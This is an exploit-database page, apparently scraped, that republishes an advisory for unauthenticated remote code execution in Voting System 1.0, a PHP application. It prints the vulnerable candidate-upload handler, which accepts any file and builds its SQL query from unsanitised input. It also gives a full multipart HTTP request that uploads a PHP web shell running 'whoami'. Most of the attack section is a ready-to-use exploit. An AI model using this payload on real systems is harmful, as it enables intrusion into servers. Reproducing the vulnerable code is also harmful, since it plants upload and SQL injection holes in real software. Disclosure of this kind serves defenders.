Registervoting system 1.0 remote code execution (unauthenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07/05/2021 # Exploit Author: secure77 # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB Unauthenticated file upload is possible via /admin/candidates_add.php that can use for RCE. Your upload will be stored at /images/ and is also accessible without authentication. ########################### Vulnerable code ############################ <?php include 'includes/session.php'; if(isset($_POST['add'])){ $firstname = $_POST['firstname']; $lastname = $_POST['lastname']; $position = $_POST['position']; $platform = $_POST['platform']; $filename = $_FILES['photo']['name']; if(!empty($filename)){ move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename); } $sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')"; if($conn->query($sql)){ $_SESSION['success'] = 'Candidate added successfully'; } else{ $_SESSION['error'] = $conn->error; } } else{ $_SESSION['error'] = 'Fill up add form first'; } header('location: candidates.php'); ?> ########################### Payload ############################ POST /admin/candidates_add.php HTTP/1.1 Host: 192.168.1.1 Content-Length: 275 Cache-Control: max-age=0 Origin: http://192.168.1.1 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/admin/candidates.php Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: application/octet-stream <?php echo exec("whoami"); ?> ------WebKitFormBoundaryrmynB2CmGO6vwFpO Content-Disposition: form-data; name="add"
Voting system 1.0 remote code execution (unauthenticated) Vulnerability / Exploit Source : Voting system 1.0 remote code execution (unauthenticated)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes